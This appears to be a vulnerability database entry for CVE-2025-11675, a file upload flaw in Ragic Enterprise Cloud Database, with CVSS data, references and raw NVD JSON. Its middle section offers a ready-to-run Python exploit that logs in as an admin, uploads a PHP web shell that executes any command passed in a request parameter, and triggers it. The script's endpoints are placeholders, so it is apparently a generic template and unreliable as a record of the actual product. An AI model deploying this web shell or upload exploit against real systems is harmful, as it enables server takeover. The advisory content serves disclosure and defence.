CVE-2025-11675

Description

Enterprise Cloud Database developed by Ragic has an Arbitrary File Upload vulnerability, allowing privileged remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Ragic Enterprise Cloud Database（具体受影响版本待官方确认）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11675 - Ragic Enterprise Cloud Database Arbitrary File Upload PoC
# This PoC demonstrates the arbitrary file upload vulnerability
# that allows uploading a web shell backdoor for RCE

import requests

# Target configuration
TARGET_URL = "https://target-ragic-instance.com"
UPLOAD_ENDPOINT = "/api/upload"  # Adjust based on actual endpoint
SHELL_PATH = "/uploads/shell.php"  # Path where shell will be accessible

# Attacker credentials (requires high privilege - PR:H)
USERNAME = "admin"
PASSWORD = "password123"

# Web shell content
WEBSHELL_CONTENT = b"""<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>"""

def exploit():
    session = requests.Session()

    # Step 1: Login with high privilege credentials
    login_url = f"{TARGET_URL}/login"
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    resp = session.post(login_url, data=login_data)
    print(f"[*] Login response: {resp.status_code}")

    # Step 2: Upload malicious web shell file
    upload_url = f"{TARGET_URL}{UPLOAD_ENDPOINT}"
    files = {
        "file": ("shell.php", WEBSHELL_CONTENT, "application/x-php")
    }
    resp = session.post(upload_url, files=files)
    print(f"[*] Upload response: {resp.status_code}")

    # Step 3: Access uploaded web shell to execute commands
    shell_url = f"{TARGET_URL}{SHELL_PATH}?cmd=id"
    resp = requests.get(shell_url)
    print(f"[*] Shell execution response: {resp.text}")

    if "uid=" in resp.text:
        print("[+] Exploit successful! Remote code execution achieved.")
    else:
        print("[-] Exploit may have failed. Check target manually.")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11675
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11675
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11675/
[4] VulDB https://vuldb.com/cve/CVE-2025-11675
[5] https://www.twcert.org.tw/en/cp-139-10424-4e42c-2.html
[6] https://www.twcert.org.tw/tw/cp-132-10423-a3861-1.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11675", "sourceIdentifier": "[email protected]", "published": "2025-10-13T08:15:41.137", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Enterprise Cloud Database developed by Ragic has an Arbitrary File Upload vulnerability, allowing privileged remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10424-4e42c-2.html", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/tw/cp-132-10423-a3861-1.html", "source": "[email protected]"}]}}